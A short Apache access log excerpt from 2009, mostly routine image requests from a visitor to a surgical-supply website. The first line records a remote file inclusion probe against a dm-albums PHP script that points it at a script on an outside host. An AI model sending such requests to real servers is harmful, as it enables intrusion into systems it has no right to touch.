204.30.3.225 - - [15/Jul/2009:06:19:46 -0400] "GET /logs/access_log.Q109070200%20%20//[path]/dm-albums/template/album.php?SECURITY_FILE=http://aboutav.com//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
81.37.45.32 - - [15/Jul/2009:06:19:57 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:19:57 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:19:58 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:19:58 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:12 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:12 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
